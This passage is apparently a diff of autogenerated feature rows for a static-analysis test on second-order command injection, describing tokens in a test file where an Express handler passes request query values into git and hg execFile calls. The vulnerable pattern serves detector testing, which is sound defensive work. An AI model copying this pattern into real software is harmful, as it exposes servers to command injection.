indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:27:37:31 | "fpp" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:34:37:39 | concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:34:37:39 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:34:37:39 | concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:34:37:39 | concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:34:37:39 | concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:43 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:43 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:43 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:43 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:49 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:49 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:49 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:49 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:49 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:41:37:63 | req.que ... nerable | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:45:37:49 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:45:37:49 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:45:37:49 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:45:37:49 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:45:37:49 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:51:37:63 | notVulnerable | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:51:37:63 | notVulnerable | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:51:37:63 | notVulnerable | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:51:37:63 | notVulnerable | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:51:37:63 | notVulnerable | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | exceptional return of execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | exceptional return of execFil ... emote]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | exceptional return of execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | exceptional return of execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | exceptional return of execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:3:40:45 | execFil ... emote]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:12:40:15 | "hg" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:18:40:44 | ["clone ... remote] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:19:40:25 | "clone" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:30 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:30 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:30 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:30 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:30 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:36 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:36 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:36 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:36 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:36 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:32:40:36 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:32:40:36 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:32:40:36 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:32:40:36 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:32:40:36 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:38:40:43 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:38:40:43 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:38:40:43 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:38:40:43 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:38:40:43 | remote | fileImports | child_process express | +| 